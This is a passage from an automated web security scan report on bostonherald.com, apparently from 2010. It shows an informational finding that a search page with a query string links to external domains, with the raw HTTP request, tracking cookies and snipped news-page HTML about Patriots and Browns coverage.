rticleid=1291805" title="Illegals’ medical bills top $35.7M"
onclick="switchPhoto('183439');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183439" src="http://multimedia.heraldinteractive.com/images/20101026/stp/07fb42_immi_10272010.jpg" title="Compiled by Jessica Van Sack."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1291805" title="Illegals’ medical bills top $35.7M"
onclick="switchPhoto('183518');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183518" src="http://multimedia.heraldinteractive.com/images/20101027/stp/dac5aa_ltpEMS102710.jpg" title="A pair of Boston EMS ambulances are seen in the above Herald file photo. Massachusetts and U.S. taxpayers coughed up a staggering $35.7 million this year in free emergency health care for more than 52,000 illegal aliens in the Bay State."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
35" title="Tim Cahill: Paul Loscocco will get nothing if elected L.G."
onclick="switchPhoto('183393');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183393" src="http://multimedia.heraldinteractive.com/images/20101026/stp/5f43ba_cahil.jpg" title=" In this June 16, 2010 file photo independent gubernatorial candidate Timothy Cahill speaks during a radio debate at the WRKO-AM 680 studios in Boston."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
k/view.bg?articleid=1291565" title="Green means go for Celtics opener"
onclick="switchPhoto('183328');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183328" src="http://multimedia.heraldinteractive.com/images/20101026/stp/2a99db_rallen10262010.jpg" title="Celtics guard Ray Allen challenges fans to a game of ‘Knockout’ for the chance to win tickets to tonight’s home opener as well as a starring role in a Dunkin’ Donuts commercial."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
k/view.bg?articleid=1291565" title="Green means go for Celtics opener"
onclick="switchPhoto('183285');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183285" src="http://multimedia.heraldinteractive.com/images/20101025/stp/30a405_shaq_10262010.jpg" title="Boston Celtics center Shaquille O’Neal helps load donated boxes of pasta at Buca di Beppo in Lexington onto a
truck bound for the Greater Boston Food Bank."
alt="Matthew Healey" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1291562" title="Final showdown fizzles without fireworks"
onclick="switchPhoto('183277');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183277" src="http://multimedia.heraldinteractive.com/images/20101025/stp/c1c80f_debate_10262010.jpg" title="FOUR FOR THE CORNER: Gubernatorial candidates, from left, Jill Stein, Charlie Baker, state Treasurer Tim Cahill and Gov. Deval Patrick, square off at the debate."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
id=1291516" title="Mass. gov. hopefuls clash in final campaign debate"
onclick="switchPhoto('183256');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183256" src="http://multimedia.heraldinteractive.com/images/20101025/stp/4777b7_debate_10252010.jpg" title="From left, candidates for Massachusetts Governor, Republican Charles Baker, Independent State Treasurer Tim Cahill, and Democratic Gov. Deval Patrick, participate in a gubernatorial debate in Boston."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
w.bg?articleid=1291259" title="Gov foes pressed as final debate looms"
onclick="switchPhoto('183064');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183064" src="http://multimedia.heraldinteractive.com/images/20101024/stp/a94567_baker_10252010.jpg" title="MEET AND GREET: GOP rival Charlie Baker, left, appears with New Jersey Gov. Chris
Christie at a rally in Melrose."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.40. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/search/?topic=Cleveland+Browns&srvc=home&position=0

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DCleveland%2BBrowns%26srvc%3Dhome%26position%3D0&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://multimedia.heraldinteractive.com/images/20101027/stp/5ebcd8_Massaq_10282010.jpg
http://multimedia.heraldinteractive.com/images/20101029/stp/5eaf0b_ltpFavrelambeau102010.jpg
http://multimedia.heraldinteractive.com/images/20101101/stp/535fe6_saints11012010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/89eaac_bill_11022010.jpg
http://multimedia.heraldinteractive.com/images/20101102/stp/d30c8d_emangini11042010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/ac55cb_nfl_11032010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/c2fbd3_holgrem11032010.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/f43ba2_logan.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/e4c287_bill_11042010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/15e55a_colt_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/7c68a3_danny_11052010.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/a1119c_Mangini_10022009.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/2ce132_mankins_03042010.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/6bb262_Bill_11062010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/2e3389_brady_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/80f7dd_Bill_05292009.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/a3ecbb_belic.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/c60ae3_Colt_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f7e0bc_Time_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/f8d068_Logan_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101108/ddea8d_phillis11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/49db30_seat_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/ddea8d_phillis11082010.jpg
http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Cleveland+Browns&srvc=home&position=0 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:33:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 77374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DCleveland%2BBrowns%26srvc%3Dhome%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294821&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294821">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294821">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294814&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294814">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294814">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294814">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPoll.gif" alt="Poll" style="margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294814">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/49db30_seat_11082010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294819&format=comments">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294820">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101107/stp/2e3389_brady_11082010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294751&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294751">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294751">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294751">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294816&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniVideo.gif" alt="Video" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294816">
...[SNIP]...
</a>  
<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniGallery.gif" alt="Gallery" style="margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1294816">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20101108/stp/ddea8d_phillis11082010.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/columnists/view.bg?articleid=1294847&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/sports/columnists/view.bg?articleid=1294847">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20101108/ddea8d_phillis11082010.jpg" title="rowns running back Peyton Hillis is congratulated by fans after the Browns’ 34-14 win over the New England Patriots Sunday in Cleveland. " alt="rowns running back Peyton Hillis is congratulated by fans after the Browns’ 34-14 win over the New England Patriots Sunday in Cleveland. ">
</a>
...[SNIP]...
mnists/view.bg?articleid=1294847" title="Browns giddy after upset win"
onclick="switchPhoto('185499');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185499" src="http://multimedia.heraldinteractive.com/images/20101108/stp/ddea8d_phillis11082010.jpg" title="rowns running back Peyton Hillis is congratulated by fans after the Browns’ 34-14 win over the New England Patriots Sunday in Cleveland. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1294819" title="Tom Brady: Team had better start improving"
onclick="switchPhoto('185485');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185485" src="http://multimedia.heraldinteractive.com/images/20101108/stp/49db30_seat_11082010.jpg" title="DOWNER: Tom Brady takes a seat on the turf after being sacked during the fourth quarter of the Pats’ 34-14 loss to the Browns yesterday in Cleveland."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
ball/patriots/view.bg?articleid=1294816" title="An ending well earned"
onclick="switchPhoto('185483');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185483" src="http://multimedia.heraldinteractive.com/images/20101108/stp/bedf5e_kyle_11082010.jpg" title="LOST CAUSE: Cornerback Kyle Arrington walks away as Browns quarterback Colt McCoy celebrates his third-quarter touchdown in yesterday’s win over the Pats.

"
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
view.bg?articleid=1294814" title="Eric Mangini outdoes Bill Belichick"
onclick="switchPhoto('185482');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185482" src="http://multimedia.heraldinteractive.com/images/20101108/stp/f0cad3_shake_11082010.jpg" title="PARTING SHOT: Eric Mangini shakes hands with Bill Belichick after his Browns hammered the Patriots, 34-14, yesterday in Cleveland.

"
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
patriots/view.bg?articleid=1294751" title="Pats run over in Cleveland"
onclick="switchPhoto('185465');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185465" src="http://multimedia.heraldinteractive.com/images/20101107/stp/2e3389_brady_11082010.jpg" title="BROWNTRODDEN: New England Patriots quarterback Tom Brady reflects on what went wrong at the end of the fourth quarter while losing to the Cleveland Browns."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
/view.bg?articleid=1294648" title="Patriots need full, 60-minute game"
onclick="switchPhoto('185385');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185385" src="http://multimedia.heraldinteractive.com/images/20101107/stp/f7e0bc_Time_11072010.jpg" title="CLOCK IS TICKING: While the Pats have made improvements over last year, showing stronger play in the second half, they know they must soon put together complete, 60-minute games if they are to realize their championship aspirations."
alt="Nate Dow (photo illustration)" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1294647" title="The Top Five questions facing the Patriots today"
onclick="switchPhoto('185384');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185384" src="http://multimedia.heraldinteractive.com/images/20101107/stp/c60ae3_Colt_11072010.jpg" title="Will Cleveland Browns rookie Colt McCoy be the latest quarterback to fall victim to Bill Belichick’s schematic strategies?"
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
l/patriots/view.bg?articleid=1294644" title="Logan Mankins good to go"
onclick="switchPhoto('185382');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185382" src="http://multimedia.heraldinteractive.com/images/20101107/stp/f8d068_Logan_11072010.jpg" title="READY FOR FIRST IMPRESSION: Patriots guard Logan Mankins (right), who returned to the team last week after a lengthy holdout, will be active for today’s game against the Browns in Cleveland."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
orts/football/patriots/view.bg?articleid=1294643" title="Top Bill-ing"
onclick="switchPhoto('185381');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185381" src="http://multimedia.heraldinteractive.com/images/20101107/stp/80f7dd_Bill_05292009.jpg" title="Bill Belichick"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Gil Brandt likes Patriots’ ‘Dirty Dozen’ redux"
onclick="switchPhoto('185409');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185409" src="http://multimedia.heraldinteractive.com/images/20101107/stp/a3ecbb_belic.jpg" title="Bill Belichick"
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
to activate G Logan Mankins for Browns game, cut CB Terrence Wheatley"
onclick="switchPhoto('185282');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185282" src="http://multimedia.heraldinteractive.com/images/20101106/stp/2ce132_mankins_03042010.jpg" title="Logan Mankins"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1294413" title="Bill Belichick recalls his career in Cleveland"
onclick="switchPhoto('185203');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185203" src="http://multimedia.heraldinteractive.com/images/20101106/stp/6bb262_Bill_11062010.jpg" title="COACHING ’EM UP: Bill Belichick instructs members of the defense yesterday as the Pats prepare for tomorrow’s game against the Browns in Cleveland."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
nfl/view.bg?articleid=1294202" title="Eric Mangini’s shaky hand"
onclick="switchPhoto('185096');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185096" src="http://multimedia.heraldinteractive.com/images/20101105/stp/a1119c_Mangini_10022009.jpg" title="Browns head coach Eric Mangini"
alt="File" style="margin:0 2px" />
</a>
...[SNIP]...
nfl/view.bg?articleid=1294184" title="Colt McCoy to start at QB again"
onclick="switchPhoto('185088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185088" src="http://multimedia.heraldinteractive.com/images/20101105/stp/15e55a_colt_11052010.jpg" title="Colt McCoy."
alt="AP (file)" style="margin:0 2px" />
</a>
...[SNIP]...
ll/patriots/view.bg?articleid=1294183" title="Browns not a tough sell"
onclick="switchPhoto('185087');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="185087" src="http://multimedia.heraldinteractive.com/images/20101105/stp/7c68a3_danny_11052010.jpg" title="IN GOOD HANDS: Running back Danny Woodhead makes a grab during practice yesterday in Foxboro.

"
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
ists/view.bg?articleid=1293925" title="Bill Belichick works his magic"
onclick="switchPhoto('184843');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184843" src="http://multimedia.heraldinteractive.com/images/20101104/stp/e4c287_bill_11042010.jpg" title="Bill Belichick."
alt="Tim Correira" style="margin:0 2px" />
</a>
...[SNIP]...
fers insight into his relationship with Patriots coach Bill Belichick"
onclick="switchPhoto('184765');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184765" src="http://multimedia.heraldinteractive.com/images/20101103/stp/f43ba2_logan.jpg" title=""
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
573" title="Browns’ Mike Holmgren says team showing improvement"
onclick="switchPhoto('184722');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184722" src="http://multimedia.heraldinteractive.com/images/20101103/stp/c2fbd3_holgrem11032010.jpg" title="Cleveland Browns president Mike Holmgren."
alt="AP - File" style="margin:0 2px" />
</a>
...[SNIP]...
/view.bg?articleid=1293529" title="Mike Holmgren passes on Browns QBs"
onclick="switchPhoto('184682');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184682" src="http://multimedia.heraldinteractive.com/images/20101103/stp/ac55cb_nfl_11032010.jpg" title="SKINS GAME: Former Oakland quarterback JaMarcus Russell worked out for the Washington Redskins."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
d=1293271" title="Browns’ quarterback situation still uncertain"
onclick="switchPhoto('184473');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184473" src="http://multimedia.heraldinteractive.com/images/20101102/stp/d30c8d_emangini11042010.jpg" title="Cleveland Browns coach Eric Mangini."
alt="AP - File." style="margin:0 2px" />
</a>
...[SNIP]...
view.bg?articleid=1293248" title="But best record not fazing Patriots"
onclick="switchPhoto('184444');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184444" src="http://multimedia.heraldinteractive.com/images/20101102/stp/89eaac_bill_11022010.jpg" title="Patriots coach Bill Belichick."
alt="Tim Correira" style="margin:0 2px" />
</a>
...[SNIP]...
1293030" title="Steelers’ physical game spirited away by Saints"
onclick="switchPhoto('184315');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="184315" src="http://multimedia.heraldinteractive.com/images/20101101/stp/535fe6_saints11012010.jpg" title="Steelers quarterback Ben Roethlisberger (7) looks up after being sacked by New Orleans Saints linebacker Jonathan Vilma (51) during an NFL football game at the Louisiana Superdome in New Orleans, Sunday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1292378" title="Where have the great NFL teams gone?"
onclick="switchPhoto('183827');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183827" src="http://multimedia.heraldinteractive.com/images/20101029/stp/5eaf0b_ltpFavrelambeau102010.jpg" title="Minnesota Vikings’ Brett Favre returns to Lambeau Field to a loud chorus of boos for an NFL game against the Green Bay Packers at Lambeau Field in Green Bay, Wisconsin, Sunday, October 24, 2010."
alt="Benny Sieu/Milwaukee Journal Sentinel/MCT" style="margin:0 2px" />
</a>
...[SNIP]...
quoi practicing again, defends blow by Steelers’ James Harrison"
onclick="switchPhoto('183596');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="183596" src="http://multimedia.heraldinteractive.com/images/20101027/stp/5ebcd8_Massaq_10282010.jpg" title="Cleveland Browns wide receiver Mohamed Massaquoi practiced this week for the first time since suffering a concussion on this blow from Steelers linebacker James Harrison. Harrison was fined by the NFL for the hit."
alt="AP file" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.41. http://bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

